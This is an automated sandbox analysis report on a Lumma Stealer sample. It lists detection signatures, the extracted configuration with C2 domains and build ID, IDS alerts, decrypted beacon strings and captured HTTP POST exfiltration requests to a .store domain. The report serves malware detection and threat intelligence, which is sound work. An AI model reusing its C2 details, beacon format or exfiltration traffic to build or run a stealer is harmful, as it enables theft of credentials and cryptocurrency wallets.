Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1544564
MD5:e8febbee7f62ca4c85f34bccb279eb67
SHA1:610b9007b886130f73e723daf0fc8222ee66a396
SHA256:7b054538e0120d88a52303efa5128a62c629ded45f5fafeadf93b9f284d1a70a
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7636 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E8FEBBEE7F62CA4C85F34BCCB279EB67)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["fadehairucw.store", "crisiwarny.store", "presticitpo.store", "navygenerayk.store", "necklacedmny.store", "thumbystriw.store", "founpiuer.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1862847814.0000000001487000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: file.exe PID: 7636JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
              Click to see the 3 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-29T15:27:15.847011+010020546531A Network Trojan was detected192.168.2.749704188.114.96.3443TCP
              2024-10-29T15:27:18.068779+010020546531A Network Trojan was detected192.168.2.749715188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-29T15:27:15.847011+010020498361A Network Trojan was detected192.168.2.749704188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-29T15:27:18.068779+010020498121A Network Trojan was detected192.168.2.749715188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-29T15:28:14.202045+010020480941Malware Command and Control Activity Detected192.168.2.749979188.114.96.3443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Found malware configuration
              Source: file.exe.7636.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["fadehairucw.store", "crisiwarny.store", "presticitpo.store", "navygenerayk.store", "necklacedmny.store", "thumbystriw.store", "founpiuer.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}
              Multi AV Scanner detection for submitted file
              Source: file.exeReversingLabs: Detection: 42%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmpString decryptor: scriptyprefej.store
              Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmpString decryptor: navygenerayk.store
              Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmpString decryptor: founpiuer.store
              Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacedmny.store
              Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmpString decryptor: thumbystriw.store
              Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmpString decryptor: fadehairucw.store
              Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmpString decryptor: crisiwarny.store
              Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
              Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
              Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49970 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49977 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49979 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49980 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49981 version: TLS 1.2

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49715 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49715 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49704 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49704 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49979 -> 188.114.96.3:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: fadehairucw.store
              Source: Malware configuration extractorURLs: crisiwarny.store
              Source: Malware configuration extractorURLs: presticitpo.store
              Source: Malware configuration extractorURLs: navygenerayk.store
              Source: Malware configuration extractorURLs: necklacedmny.store
              Source: Malware configuration extractorURLs: thumbystriw.store
              Source: Malware configuration extractorURLs: founpiuer.store
              Source: Malware configuration extractorURLs: scriptyprefej.store
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12849Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15081Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20406Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1213Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 550975Host: necklacedmny.store
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: presticitpo.store
              Source: global trafficDNS traffic detected: DNS query: crisiwarny.store
              Source: global trafficDNS traffic detected: DNS query: fadehairucw.store
              Source: global trafficDNS traffic detected: DNS query: thumbystriw.store
              Source: global trafficDNS traffic detected: DNS query: necklacedmny.store
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
              Source: file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.1950914872.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2340779030.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1862847814.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2340350383.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microX
              Source: file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: file.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
              Source: file.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
              Source: file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: file.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
              Source: file.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
              Source: file.exe, 00000000.00000003.1897569815.00000000014E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1897711414.00000000014E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.sto
              Source: file.exe, 00000000.00000003.1950914872.00000000014D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/
              Source: file.exe, 00000000.00000003.1384736970.00000000014D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/C
              Source: file.exe, 00000000.00000003.1384736970.00000000014D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/K
              Source: file.exe, 00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2340350383.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api
              Source: file.exe, 00000000.00000003.1897569815.00000000014E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1897711414.00000000014E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api7U
              Source: file.exe, 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apis9
              Source: file.exe, 00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apis?
              Source: file.exe, 00000000.00000003.2341515755.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2351913057.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2341482774.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2349342811.00000000014A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apix
              Source: file.exe, 00000000.00000003.2340513943.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/hd
              Source: file.exe, 00000000.00000003.1384736970.00000000014D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/k
              Source: file.exe, 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/p
              Source: file.exe, 00000000.00000003.1862847814.0000000001487000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/qP
              Source: file.exe, file.exe, 00000000.00000003.1862847814.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store:443/api
              Source: file.exe, 00000000.00000003.2348526012.000000000145F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1878781557.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store:443/apil
              Source: file.exe, 00000000.00000003.1880747839.0000000005F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.1880747839.0000000005F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
              Source: file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: file.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
              Source: file.exe, 00000000.00000003.1880747839.0000000005F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
              Source: file.exe, 00000000.00000003.1880747839.0000000005F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
              Source: file.exe, 00000000.00000003.1880747839.0000000005F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
              Source: file.exe, 00000000.00000003.1880747839.0000000005F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.1880747839.0000000005F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49970 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49977 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49979 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49980 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49981 version: TLS 1.2

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .rsrc
              Source: file.exeStatic PE information: section name: .idata
              Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014974490_3_01497449
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014974490_3_01497449
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014A37F40_3_014A37F4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014A37F40_3_014A37F4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014DED610_3_014DED61
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014DEDF10_3_014DEDF1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014974490_3_01497449
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014974490_3_01497449
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014AB84F0_3_014AB84F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014A37F40_3_014A37F4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014A37F40_3_014A37F4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014DED610_3_014DED61
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014DEDF10_3_014DEDF1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014974490_3_01497449
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014974490_3_01497449
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014A37F40_3_014A37F4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014A37F40_3_014A37F4
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: ZLIB complexity 0.9978448275862069
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@5/1
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.1863317747.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1863683992.0000000005C66000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385017883.0000000005C96000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385242528.0000000005C78000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exeReversingLabs: Detection: 42%
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
